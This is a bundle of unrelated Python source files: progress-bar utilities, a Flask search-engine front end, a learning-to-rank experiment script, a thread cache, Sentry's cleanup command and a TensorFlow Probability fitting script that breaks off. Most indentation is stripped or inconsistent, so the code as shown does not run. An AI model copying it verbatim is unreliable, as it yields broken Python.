that will fetch a row-value for that column, given the resource
corresponding to the row.
"""
total_items = 0
rows = [[title for (title, unused_func) in col_fetchers]]
for item in items:
total_items += 1
row = []
for (unused_title, func) in col_fetchers:
value = func(item)
if value is None:
row.append('-')
else:
row.append(value)
rows.append(row)
max_col_widths = [0] * len(col_fetchers)
for row in rows:
for col in range(len(row)):
max_col_widths[col] = max(max_col_widths[col], len(str(row[col]))+2)
for row in rows:
for col in range(len(row)):
width = max_col_widths[col]
item = str(row[col])
if len(item) < width and col != len(row)-1:
item += ' ' * (width - len(item))
log.out.write(item)
log.out.write('\n')
if not total_items:
log.status.write('Listed 0 items.\n')
class ProgressTracker(object):
"""A context manager for telling the user about long-running progress."""
SPIN_MARKS = [
'|',
'/',
'-',
'\\',
]
def __init__(self, message, autotick=True):
self._message = message
self._prefix = message + '...'
self._ticks = 0
self._autotick = autotick
self._done = False
self._lock = threading.Lock()
def __enter__(self):
log.file_only_logger.info(self._prefix)
sys.stderr.write(self._prefix)
if self._autotick:
def Ticker():
while True:
time.sleep(1)
if self.Tick():
return
threading.Thread(target=Ticker).start()
return self
def Tick(self):
"""Give a visual indication to the user that some progress has been made."""
with self._lock:
if not self._done:
self._ticks += 1
self._Print()
sys.stderr.write(
ProgressTracker.SPIN_MARKS[
self._ticks % len(ProgressTracker.SPIN_MARKS)])
return self._done
def _Print(self):
sys.stderr.write('\r' + self._prefix)
def __exit__(self, unused_type, unused_value, unused_traceback):
with self._lock:
self._done = True
self._Print()
sys.stderr.write('done.\n')
class ProgressBar(object):
"""A simple progress bar for tracking completion of an action.
This progress bar works without having to use any control characters. It
prints the action that is being done, and then fills a progress bar below it.
You should not print anything else on the output stream during this time as it
will cause the progress bar to break on lines.
This class can also be used in a context manager.
"""
@staticmethod
def _DefaultCallback(progress_factor):
pass
DEFAULT_CALLBACK = _DefaultCallback
@staticmethod
def SplitProgressBar(original_callback, weights):
"""Splits a progress bar into logical sections.
Wraps the original callback so that each of the subsections can use the full
range of 0 to 1 to indicate its progress. The overall progress bar will
display total progress based on the weights of the tasks.
Args:
original_callback: f(float), The original callback for the progress bar.
weights: [float], The weights of the tasks to create. These can be any
numbers you want and the split will be based on their proportions to
each other.
Raises:
ValueError: If the weights don't add up to 1.
Returns:
(f(float), ), A tuple of callback functions, in order, for the subtasks.
"""
if (original_callback is None or
original_callback == ProgressBar.DEFAULT_CALLBACK):
return tuple([ProgressBar.DEFAULT_CALLBACK for _ in range(len(weights))])
def MakeCallback(already_done, weight):
def Callback(done_fraction):
original_callback(already_done + (done_fraction * weight))
return Callback
total = float(sum(weights))
callbacks = []
already_done = 0
for weight in weights:
normalized_weight = weight / total
callbacks.append(MakeCallback(already_done, normalized_weight))
already_done += normalized_weight
return tuple(callbacks)
def __init__(self, label, stream=log.status, total_ticks=60):
"""Creates a progress bar for the given action.
Args:
label: str, The action that is being performed.
stream: The output stream to write to, stderr by default.
total_ticks: int, The number of ticks wide to make the progress bar.
"""
self._stream = stream
self._ticks_written = 0
self._total_ticks = total_ticks
max_label_width = self._total_ticks - 4
if len(label) > max_label_width:
label = label[:max_label_width - 3] + '...'
elif len(label) < max_label_width:
diff = max_label_width - len(label)
label += ' ' * diff
self._label = '|- {label} -|'.format(label=label)
def Start(self):
"""Starts the progress bar by writing the label."""
self._stream.write(self._label + '\n')
self._stream.write('|')
self._ticks_written = 0
def SetProgress(self, progress_factor):
"""Sets the current progress of the task.
This method has no effect if the progress bar has already progressed past
the progress you call it with (since the progress bar cannot back up).
Args:
progress_factor: float, The current progress as a float between 0 and 1.
"""
expected_ticks = int(self._total_ticks * progress_factor)
new_ticks = expected_ticks - self._ticks_written
# Don't allow us to go over 100%.
new_ticks = min(new_ticks, self._total_ticks - self._ticks_written)
if new_ticks > 0:
self._stream.write('=' * new_ticks)
self._ticks_written += new_ticks
if expected_ticks == self._total_ticks:
self._stream.write('|\n')
self._stream.flush()
def Finish(self):
"""Mark the progress as done."""
self.SetProgress(1)
def __enter__(self):
self.Start()
return self
def __exit__(self, *args):
self.Finish()
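# Illustrative usage (not part of the original module): a progress bar whose callback is
# split into two weighted sub-tasks; the label, weights and progress values are examples.
#
#   bar = ProgressBar('Uploading files')
#   bar.Start()
#   download_cb, index_cb = ProgressBar.SplitProgressBar(bar.SetProgress, [3, 1])
#   download_cb(0.5)   # overall progress is 0.375 (half of the 75% weight)
#   download_cb(1.0)
#   index_cb(1.0)      # overall progress reaches 1.0 and the bar finishes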
|
index.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
UI - a simple web search engine.
The goal is to index an infinite list of URLs (web pages),
and then be able to quickly search relevant URLs against a query.
See https://github.com/AnthonySigogne/web-search-engine for more information.
"""
__author__ = "Anthony Sigogne"
__copyright__ = "Copyright 2017, Byprog"
__email__ = "[email protected]"
__license__ = "MIT"
__version__ = "1.0"
import os
import requests
from urllib import parse
from flask import Flask, request, jsonify, render_template
import sys
import time
import threading
from rank.query_test import query_test
from server.crawl_abstract import get_abstracts, get_urls
from utils.constants import permuterm, term2doc_dict
print("docs loaded:", len(permuterm), len(permuterm.keys()))
previous_search_res = None
abstract_Flag = True
previous_search_res_abs = []
search_res = None
search_titles = None
previous_query = None
current_start = 0
current_hits = 5
previous_search_time = 0
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__, instance_relative_config=True)
app.config.from_mapping(
SECRET_KEY='dev',
DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),
)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
# ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
@app.route("/", methods=['GET'])
def search():
"""
URL : /
Query engine to find a list of relevant URLs.
Method : POST or GET (no query)
Form data :
- query : the search query
- hits : the number of hits returned by query
- start : the start of hits
Return a template view with the list of relevant URLs.
"""
global previous_search_res, previous_search_res_abs, search_res, previous_query, search_titles
global current_start, current_hits, previous_search_time, update_page_Flag, abstract_Flag
# GET data
query = request.args.get("query", None)
top_k = int(request.args.get("top_k", type=int, default=20))
doc_name = request.args.get("doc_name", type=str, default=None)
print("query is:", query)
start = request.args.get("start", 0, type=int)
hits = request.args.get("hits", 5, type=int)
print("start", start)
print("hits", hits)
if start < 0 or hits < 0:
return "Error, start or hits cannot be negative numbers"
if previous_query != query:
update_page_Flag = True
if previous_query != query or start != current_start:
abstract_Flag = True
if query:
try:
if previous_search_res is not None and previous_query == query:
search_time = previous_search_time
search_res = list(previous_search_res)[start:start + hits]
else:
start_time = time.time()
search_titles = list(query_test(query, top_k))
if len(search_titles) < top_k:
top_k = len(search_titles)
search_titles = search_titles[:top_k]
urls = get_urls(doc_names=search_titles)
end_time = time.time()
search_abstracts = [''] * top_k
previous_search_res = list(zip(search_titles, search_abstracts, urls))
previous_search_res_abs = previous_search_res.copy()
search_res = previous_search_res[start:start + hits]
search_time = round(end_time - start_time, 2)
previous_search_time = search_time
print("search first over")
t1 = threading.Thread(target=update_page)
t1.start()
update_page_Flag = False
except:
return "Error, check your installastion"
# get data and compute range of results pages
i = int(start / hits)
maxi = 4
range_pages = range(i - 5, i + 5 if i + 5 < maxi else maxi) if i >= 6 else range(0,
maxi if maxi < 10 else 10)
# show the list of matching results
previous_query = query
current_start, current_hits = start, hits
return render_template('spatial/index.html', query=query,
response_time=search_time,
total=top_k,
hits=hits,
start=start,
range_pages=range_pages,
page=i,
search_res=search_res,
maxpage=max(range_pages))
# return homepage (no query)
return render_template('spatial/index.html')
def update_page():
if not update_page_Flag:
return
global search_titles, previous_search_res_abs
search_abstracts = get_abstracts(doc_names=search_titles[0:5])
urls = get_urls(doc_names=search_titles)
# previous_search_res_abs = list(zip(search_titles[0:5], search_abstracts, urls)) + previous_search_res[5:]
previous_search_res_abs[0:5] = list(zip(search_titles[0:5], search_abstracts, urls))
print("First layer of Abstracts have been obtained")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        search_abstracts_2layer = get_abstracts(doc_names=search_titles[5:10])
        urls_2layer = get_urls(doc_names=search_titles[5:10])
        previous_search_res_abs[5:10] = list(zip(search_titles[5:10], search_abstracts_2layer, urls_2layer))
        print("Second layer of Abstracts have been obtained")
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        search_abstracts_3layer = get_abstracts(doc_names=search_titles[10:15])
        urls_3layer = get_urls(doc_names=search_titles[10:15])
        previous_search_res_abs[10:15] = list(zip(search_titles[10:15], search_abstracts_3layer, urls_3layer))
        print("Third layer of Abstracts have been obtained")
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        search_abstracts_4layer = get_abstracts(doc_names=search_titles[15:20])
        urls_4layer = get_urls(doc_names=search_titles[15:20])
        previous_search_res_abs[15:20] = list(zip(search_titles[15:20], search_abstracts_4layer, urls_4layer))
print("Fourth layer of Abstracts have been obtained")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
# search_abstracts = get_abstracts(doc_names=search_titles)
# urls = get_urls(doc_names=search_titles)
# previous_search_res_abs = list(zip(search_titles, search_abstracts, urls))
# print("Abstracts have been obtained")
# print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
@app.route("/", methods=['POST'])
def abstract():
"""
URL : /
Query engine to find a list of relevant URLs.
Method : POST or GET (no query)
Form data :
- query : the search query
- hits : the number of hits returned by query
- start : the start of hits
Return a template view with the list of relevant URLs.
"""
global abstract_Flag, previous_search_res_abs, previous_search_res, previous_search_time, previous_query
global current_start, current_hits
# GET data
print("into abstract function")
query = request.args.get("query", None)
top_k = int(request.args.get("top_k", type=int, default=20))
doc_name = request.args.get("doc_name", type=str, default=None)
start = current_start
hits = current_hits
print("start", start)
print("hits", hits)
if start < 0 or hits < 0:
return "Error, start or hits cannot be negative numbers"
try:
print("abstract_Flag", abstract_Flag)
search_time = previous_search_time
if abstract_Flag:
search_res = list(previous_search_res_abs)[start:start + hits]
else:
search_res = list(previous_search_res)[start:start + hits]
abstract_Flag = not abstract_Flag
except:
return "Error, check your installation"
# get data and compute range of results pages
i = int(start / hits)
maxi = 4
range_pages = range(i - 5, i + 5 if i + 5 < maxi else maxi) if i >= 6 else range(0, maxi if maxi < 10 else 10)
# show the list of matching results
return render_template('spatial/index.html', query=previous_query,
response_time=previous_search_time,
total=top_k,
hits=hits,
start=start,
range_pages=range_pages,
page=i,
search_res=search_res,
maxpage=max(range_pages))
@app.route("/reference", methods=['POST'])
def reference():
"""
URL : /reference
Request the referencing of a website.
Method : POST
Form data :
- url : url to website
- email : contact email
Return homepage.
"""
# POST data
data = dict((key, request.form.get(key)) for key in request.form.keys())
if not data.get("url", False) or not data.get("email", False):
return "Vous n'avez pas renseigné l'URL ou votre email."
# query search engine
try:
r = requests.post('http://%s:%s/reference' % (host, port), data={
'url': data["url"],
'email': data["email"]
})
except:
return "Une erreur s'est produite, veuillez réessayer ultérieurement"
return "Votre demande a bien été prise en compte et sera traitée dans les meilleurs délais."
# -- JINJA CUSTOM FILTERS -- #
@app.template_filter('truncate_title')
def truncate_title(title):
"""
Truncate title to fit in result format.
"""
return title if len(title) <= 70 else title[:70] + "..."
@app.template_filter('truncate_description')
def truncate_description(description):
"""
Truncate description to fit in result format.
"""
if len(description) <= 160:
return description
cut_desc = ""
character_counter = 0
for i, letter in enumerate(description):
character_counter += 1
if character_counter > 160:
if letter == ' ':
return cut_desc + "..."
else:
return cut_desc.rsplit(' ', 1)[0] + "..."
cut_desc += description[i]
return cut_desc
@app.template_filter('truncate_url')
def truncate_url(url):
"""
Truncate url to fit in result format.
"""
# url = parse.unquote(url)
        # url = 'https://www.begtut.com/python/ref-requests-post.html'
if len(url) <= 60:
return url
url = url[:-1] if url.endswith("/") else url
url = url.split("//", 1)[1].split("/")
url = "%s/.../%s" % (url[0], url[-1])
return url[:60] + "..." if len(url) > 60 else url
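    # Template-side sketch (illustrative, not from the original project): once the
    # filters above are registered they can be applied in the Jinja template this
    # app renders (spatial/index.html), where each entry of search_res is a
    # (title, abstract, url) tuple as built into previous_search_res_abs above:
    #
    #   <h3>{{ res[0] | truncate_title }}</h3>
    #   <p>{{ res[1] | truncate_description }}</p>
    #   <a href="{{ res[2] }}">{{ res[2] | truncate_url }}</a>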
return app
if __name__ == '__main__':
print("docs loaded:", len(permuterm), len(permuterm.keys()))
app = create_app()
app.run()
|
run_PDGD_batch_update.py
|
# experiments run for PDGD updating in batch (single client)
import os
import sys
sys.path.append('../')
from data.LetorDataset import LetorDataset
from ranker.PDGDLinearRanker import PDGDLinearRanker
from clickModel.SDBN import SDBN
from clickModel.PBM import PBM
from utils import evl_tool
import numpy as np
import multiprocessing as mp
import pickle
from tqdm import tqdm
def run(train_set, test_set, ranker, num_interation, click_model, batch_size, seed):
# initialise
offline_ndcg_list = []
online_ndcg_list = []
query_set = train_set.get_all_querys()
np.random.seed(seed)
index = np.random.randint(query_set.shape[0], size=num_interation)
num_iter = 0
gradients = np.zeros(train_set._feature_size)
# update in interactions
for i in index: # interaction
num_iter += 1
# one interaction (randomly choose a query from dataset)
qid = query_set[i]
result_list, scores = ranker.get_query_result_list(train_set, qid)
clicked_doc, click_label, _ = click_model.simulate(qid, result_list, train_set)
# accumulate gradients in batch
gradients += ranker.update_to_clicks(click_label, result_list, scores, train_set.get_all_features_by_query(qid), return_gradients=True)
# online evaluation
        online_ndcg = evl_tool.query_ndcg_at_k(train_set, result_list, qid, 10)  # ndcg@k evaluation on training_set (uses true relevance labels)
online_ndcg_list.append(online_ndcg)
# offline evaluation (to the current ranker)
all_result = ranker.get_all_query_result_list(test_set)
offline_ndcg = evl_tool.average_ndcg_at_k(test_set, all_result, 10) # off-line ndcg evaluation on test_set of each batch
offline_ndcg_list.append(offline_ndcg)
if num_iter % batch_size == 0:
# update ranker in batches
ranker.update_to_gradients(gradients) # get weights updated
gradients = np.zeros(train_set._feature_size)
final_weights = ranker.get_current_weights()
return offline_ndcg_list, online_ndcg_list, final_weights
def job(model_type, f, train_set, test_set, output_fold, batch_size, pc, ps):
cm = SDBN(pc, ps) # pc: click probability, ps: stop probability
for seed in tqdm(range(1, 6)):
ranker = PDGDLinearRanker(FEATURE_SIZE, Learning_rate)
print("\n", "PDGD fold{} {} run{} start!".format(f, model_type, seed), "\n")
offline_ndcg, online_ndcg, final_weights = run(train_set, test_set, ranker, NUM_INTERACTION, cm, batch_size, seed)
os.makedirs(os.path.dirname("{}/fold{}/".format(output_fold, f)),
exist_ok=True) # create directory if not exist
with open(
"{}/fold{}/{}_run{}_offline_ndcg.txt".format(output_fold, f, model_type, seed),
"wb") as fp:
pickle.dump(offline_ndcg, fp)
with open(
"{}/fold{}/{}_run{}_online_ndcg.txt".format(output_fold, f, model_type, seed),
"wb") as fp:
pickle.dump(online_ndcg, fp)
with open(
"{}/fold{}/{}_run{}_weights.txt".format(output_fold, f, model_type, seed),
"wb") as fp:
pickle.dump(final_weights, fp)
print("\n", "PDGD fold{} {} run{} finished!".format(f, model_type, seed), "\n")
if __name__ == "__main__":
NUM_INTERACTION = 8000000
click_models = ["informational", "navigational", "perfect"]
Learning_rate = 0.1
batch_sizes = [800]
datasets = ["MQ2007"] # ["MQ2007", "MSLR10K"]
mslr10k_fold = "../datasets/MSLR10K"
mslr10k_output = "../results/PDGD/MSLR10K/MSLR10K_batch_update_size{}_grad_add_total{}"
mq2007_fold = "../datasets/MQ2007"
mq2007_output = "../results/PDGD/MQ2007/MQ2007_batch_update_size{}_grad_add_total{}"
mq2008_fold = "../datasets/MQ2008"
mq2008_output = "../results/PDGD/MQ2008/MQ2008_batch_update_size{}_grad_add_total{}"
Yahoo_fold = "../datasets/Yahoo"
Yahoo_output = "../results/PDGD/yahoo/yahoo_batch_update_size{}_grad_add_total{}"
dataset_root_dir = "../datasets"
output_root_dir = "../results"
cache_path = "../datasets/cache"
for batch_size in batch_sizes:
for dataset in datasets:
output_fold = f"{output_root_dir}/PDGD/{dataset}/{dataset}_PDGD_batch_update_size{batch_size}_grad_add_total{NUM_INTERACTION}"
paths = [
                (mslr10k_fold, mslr10k_output.format(batch_size, NUM_INTERACTION)),
                (mq2007_fold, mq2007_output.format(batch_size, NUM_INTERACTION)),
# (mq2008_fold, mq2008_output.format(batch_size, NUM_INTERACTION)),
# (Yahoo_fold, Yahoo_output.format(batch_size, NUM_INTERACTION))
]
for path in paths:
dataset_fold = path[0]
output_fold = path[1]
processors = []
for click_model in tqdm(click_models):
# adding parameters based on different datasets and click_model
# (feature_size, normalization, fold_range, clicking probability, stopping probability)
if dataset_fold == "../datasets/MSLR10K":
FEATURE_SIZE = 136
norm = True
fold_range = range(1, 6)
if click_model == "perfect":
pc = [0.0, 0.2, 0.4, 0.8, 1.0]
ps = [0.0, 0.0, 0.0, 0.0, 0.0]
elif click_model == "navigational":
pc = [0.05, 0.3, 0.5, 0.7, 0.95]
ps = [0.2, 0.3, 0.5, 0.7, 0.9]
elif click_model == "informational":
pc = [0.4, 0.6, 0.7, 0.8, 0.9]
ps = [0.1, 0.2, 0.3, 0.4, 0.5]
elif dataset_fold == "../datasets/MQ2007" or dataset_fold == "../datasets/MQ2008":
FEATURE_SIZE = 46
norm = False
fold_range = range(1, 6)
if click_model == "perfect":
pc = [0.0, 0.5, 1.0]
ps = [0.0, 0.0, 0.0]
elif click_model == "navigational":
pc = [0.05, 0.5, 0.95]
ps = [0.2, 0.5, 0.9]
elif click_model == "informational":
pc = [0.4, 0.7, 0.9]
ps = [0.1, 0.3, 0.5]
elif dataset_fold == "../datasets/Yahoo":
FEATURE_SIZE = 700
norm = False
fold_range = range(1, 2)
if click_model == "perfect":
pc = [0.0, 0.2, 0.4, 0.8, 1.0]
ps = [0.0, 0.0, 0.0, 0.0, 0.0]
elif click_model == "navigational":
pc = [0.05, 0.3, 0.5, 0.7, 0.95]
ps = [0.2, 0.3, 0.5, 0.7, 0.9]
elif click_model == "informational":
pc = [0.4, 0.6, 0.7, 0.8, 0.9]
ps = [0.1, 0.2, 0.3, 0.4, 0.5]
for f in tqdm(fold_range):
train_path = "{}/Fold{}/train.txt".format(dataset_fold, f)
test_path = "{}/Fold{}/test.txt".format(dataset_fold, f)
train_set = LetorDataset(train_path, FEATURE_SIZE, query_level_norm=norm, cache_root=cache_path)
test_set = LetorDataset(test_path, FEATURE_SIZE, query_level_norm=norm, cache_root=cache_path)
print(dataset_fold, click_model, f, batch_size)
p = mp.Process(target=job, args=(click_model, f, train_set, test_set, output_fold, batch_size, pc, ps))
p.start()
processors.append(p)
for p in processors:
p.join()
|
thread_caching.py
|
import typing as t
from itertools import count
from threading import Lock, Thread
import outcome
IDLE_TIMEOUT = 10
name_counter = count()
class WorkerThread:
def __init__(self, thread_cache: t.Any) -> None:
self._job = None
self._thread_cache = thread_cache
self._worker_lock = Lock()
self._worker_lock.acquire()
thread = Thread(target=self._work, daemon=True)
thread.name = f"Worker thread {next(name_counter)}"
thread.start()
def _work(self) -> None:
while True:
if self._worker_lock.acquire(timeout=IDLE_TIMEOUT):
fn, deliver = self._job
self._job = None
result = outcome.capture(fn)
self._thread_cache._idle_workers[self] = None
deliver(result)
del fn
del deliver
else:
try:
del self._thread_cache._idle_workers[self]
except KeyError:
continue
else:
return
class ThreadCache:
def __init__(self) -> None:
self._idle_workers = {}
def start_thread_soon(self, fn: t.Callable, deliver: t.Any) -> None:
try:
worker, _ = self._idle_workers.popitem()
except KeyError:
worker = WorkerThread(self)
worker._job = (fn, deliver)
worker._worker_lock.release()
THREAD_CACHE = ThreadCache()
def start_thread_soon(fn: t.Any, deliver: t.Any) -> None:
THREAD_CACHE.start_thread_soon(fn, deliver)
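# Minimal usage sketch (not part of the original module): hand a function to the
# cache and receive its result through the `deliver` callback, which is passed an
# outcome.Outcome (unwrap() returns the value or re-raises the error). The names
# `expensive_call` and `done` are illustrative.
if __name__ == "__main__":
    from threading import Event

    done = Event()

    def expensive_call() -> int:
        # stand-in for real blocking work
        return sum(range(1000))

    def deliver(result) -> None:
        print("worker returned:", result.unwrap())
        done.set()

    start_thread_soon(expensive_call, deliver)
    done.wait(timeout=5)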
|
cleanup.py
|
"""
sentry.runner.commands.cleanup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import os
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
from sentry.models import Project
try:
if value.isdigit():
return int(value)
if '/' not in value:
return None
org, proj = value.split('/', 1)
return Project.objects.get_from_cache(
organization__slug=org,
slug=proj,
).id
except Project.DoesNotExist:
return None
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
def multiprocess_worker(task_queue):
# Configure within each Process
import logging
from sentry.utils.imports import import_string
logger = logging.getLogger('sentry.cleanup')
configured = False
while True:
j = task_queue.get()
if j == _STOP_WORKER:
task_queue.task_done()
return
# On first task, configure Sentry environment
if not configured:
from sentry.runner import configure
configure()
from sentry import models
from sentry import deletions
from sentry import similarity
skip_models = [
# Handled by other parts of cleanup
models.Event,
models.EventMapping,
models.EventAttachment,
models.UserReport,
models.Group,
models.GroupEmailThread,
models.GroupRuleStatus,
# Handled by TTL
similarity.features,
] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
configured = True
model, chunk = j
model = import_string(model)
try:
task = deletions.get(
model=model,
query={'id__in': chunk},
skip_models=skip_models,
transaction_id=uuid4().hex,
)
while True:
if not task.chunk():
break
except Exception as e:
logger.exception(e)
finally:
task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
'--concurrency',
type=int,
default=1,
show_default=True,
help='The total number of concurrent worker processes to run.'
)
@click.option(
'--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
'--timed',
'-t',
default=False,
is_flag=True,
help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
"""Delete a portion of trailing data based on creation date.
All data that is older than `--days` will be deleted. The default for
this is 30 days. In the default setting all projects will be truncated
but if you have a specific project you want to limit this to this can be
done with the `--project` flag which accepts a project ID or a string
with the form `org/project` where both are slugs.
"""
if concurrency < 1:
click.echo('Error: Minimum concurrency is 1', err=True)
raise click.Abort()
os.environ['_SENTRY_CLEANUP'] = '1'
# Make sure we fork off multiprocessing pool
# before we import or configure the app
from multiprocessing import Process, JoinableQueue as Queue
pool = []
task_queue = Queue(1000)
for _ in xrange(concurrency):
p = Process(target=multiprocess_worker, args=(task_queue,))
p.daemon = True
p.start()
pool.append(p)
from sentry.runner import configure
configure()
from django.db import router as db_router
from sentry.app import nodestore
from sentry.db.deletion import BulkDeleteQuery
from sentry import models
if timed:
import time
from sentry.utils import metrics
start_time = time.time()
# list of models which this query is restricted to
model_list = {m.lower() for m in model}
def is_filtered(model):
if router is not None and db_router.db_for_write(model) != router:
return True
if not model_list:
return False
return model.__name__.lower() not in model_list
# Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
# (model, datetime_field, order_by)
BULK_QUERY_DELETES = [
(models.EventMapping, 'date_added', '-date_added'),
(models.EventAttachment, 'date_added', None),
(models.UserReport, 'date_added', None),
(models.GroupEmailThread, 'date', None),
(models.GroupRuleStatus, 'date_added', None),
] + EXTRA_BULK_QUERY_DELETES
# Deletions that use the `deletions` code path (which handles their child relations)
# (model, datetime_field, order_by)
DELETES = (
(models.Event, 'datetime', 'datetime'),
(models.Group, 'last_seen', 'last_seen'),
)
if not silent:
click.echo('Removing expired values for LostPasswordHash')
if is_filtered(models.LostPasswordHash):
if not silent:
click.echo('>> Skipping LostPasswordHash')
else:
models.LostPasswordHash.objects.filter(
date_added__lte=timezone.now() - timedelta(hours=48)
).delete()
    if not silent:
        click.echo('Removing expired values for OrganizationMember')
    if is_filtered(models.OrganizationMember):
        if not silent:
            click.echo('>> Skipping OrganizationMember')
    else:
        expired_threshold = timezone.now() - timedelta(days=days)
        models.OrganizationMember.delete_expired(expired_threshold)
for model in [models.ApiGrant, models.ApiToken]:
if not silent:
click.echo(u'Removing expired values for {}'.format(model.__name__))
if is_filtered(model):
if not silent:
click.echo(u'>> Skipping {}'.format(model.__name__))
else:
model.objects.filter(expires_at__lt=timezone.now()).delete()
project_id = None
if project:
click.echo(
"Bulk NodeStore deletion not available for project selection", err=True)
project_id = get_project(project)
if project_id is None:
click.echo('Error: Project not found', err=True)
raise click.Abort()
else:
if not silent:
click.echo("Removing old NodeStore values")
cutoff = timezone.now() - timedelta(days=days)
try:
nodestore.cleanup(cutoff)
except NotImplementedError:
click.echo(
"NodeStore backend does not support cleanup operation", err=True)
for bqd in BULK_QUERY_DELETES:
if len(bqd) == 4:
model, dtfield, order_by, chunk_size = bqd
else:
chunk_size = 10000
model, dtfield, order_by = bqd
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
).execute(chunk_size=chunk_size)
for model, dtfield, order_by in DELETES:
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
imp = '.'.join((model.__module__, model.__name__))
q = BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
)
for chunk in q.iterator(chunk_size=100):
task_queue.put((imp, chunk))
task_queue.join()
# Clean up FileBlob instances which are no longer used and aren't super
# recent (as there could be a race between blob creation and reference)
if not silent:
click.echo("Cleaning up unused FileBlob references")
if is_filtered(models.FileBlob):
if not silent:
click.echo('>> Skipping FileBlob')
else:
cleanup_unused_files(silent)
# Shut down our pool
for _ in pool:
task_queue.put(_STOP_WORKER)
# And wait for it to drain
for p in pool:
p.join()
if timed:
duration = int(time.time() - start_time)
metrics.timing('cleanup.duration', duration, instance=router)
click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
"""
Remove FileBlob's (and thus the actual files) if they are no longer
referenced by any File.
We set a minimum-age on the query to ensure that we don't try to remove
any blobs which are brand new and potentially in the process of being
referenced.
"""
from sentry.models import File, FileBlob, FileBlobIndex
if quiet:
from sentry.utils.query import RangeQuerySetWrapper
else:
from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper
cutoff = timezone.now() - timedelta(days=1)
queryset = FileBlob.objects.filter(
timestamp__lte=cutoff,
)
for blob in RangeQuerySetWrapper(queryset):
if FileBlobIndex.objects.filter(blob=blob).exists():
continue
if File.objects.filter(blob=blob).exists():
continue
blob.delete()
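# Example invocation (illustrative; assumes this command is exposed through the
# standard `sentry` CLI entry point): delete data older than 60 days for one
# project, with four worker processes and timing metrics enabled. Every flag
# shown is declared on the `cleanup` command above.
#
#   sentry cleanup --days 60 --project my-org/my-project --concurrency 4 --timed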
|
fit_switch.py
|
import threading
import tensorflow_probability as tfp
import numpy as np
import tensorflow as tf
import time
import pickle
import pandas as pd
np.set_printoptions(suppress=True,precision=3)
import sys
from tensorflow_probability import distributions as tfd
from move_ns import moveNS
def setup_and_run_hmc(threadid):
np.random.seed(threadid)
tf.random.set_seed(threadid)
def sp(x):
# softplus transform with shift
return tf.nn.softplus(x)+1e-4
def rbf_kernel(x1):
# RBF kernel with single variable parameter. Other parameters are set
# to encode lengthscale of 20 days
        return tfp.math.psd_kernels.ExponentiatedQuadratic(x1, np.float64(2.0))
# initial value of kernel amplitude
lparams_init=[0.0, 3.0]
aparams_init=[0.0]
# transform for parameter to ensure positive
transforms=[sp]
# prior distribution on parameter
lpriors = [tfd.Normal(loc = np.float64(0.),scale=np.float64(5.)),
tfd.Normal(loc=np.float64(3.), scale=np.float64(1))]
# tfd.Normal(loc=np.float64(0.), scale=np.float64(10.0))]
apriors = [tfd.Normal(loc = np.float64(0.),scale=np.float64(5.))]
# create the model
mover = moveNS(T,X,Z, ID, BATCH_SIZE=1460, velocity=True,
#akernel=rbf_kernel,
aparams_init=aparams_init,
apriors=apriors,
#atransforms=transforms,
lkernel=rbf_kernel,
lparams_init=lparams_init,
lpriors=lpriors,
ltransforms=transforms,
mean_obs_noise=-5, std_obs_noise=1.0)
def build_trainable_location_scale_distribution(initial_loc, initial_scale):
with tf.name_scope('build_trainable_location_scale_distribution'):
dtype = tf.float32
initial_loc = initial_loc * tf.ones(tf.shape(initial_scale), dtype=dtype)
initial_scale = tf.nn.softplus(initial_scale * tf.ones_like(initial_loc))
loc = tf.Variable(initial_value=initial_loc, name='loc')
scale=tfp.util.TransformedVariable(tf.Variable(initial_scale, name='scale'), tfp.bijectors.Softplus())
posterior_dist = tfd.Normal(loc=loc, scale=scale)
posterior_dist = tfd.Independent(posterior_dist)
return posterior_dist
flat_component_dists = []
for kparam in mover.kernel_params:
init_loc = kparam
init_scale = tf.random.uniform(shape=kparam.shape, minval=-2, maxval=2, dtype=tf.dtypes.float32)
flat_component_dists.append(build_trainable_location_scale_distribution(init_loc,init_scale))
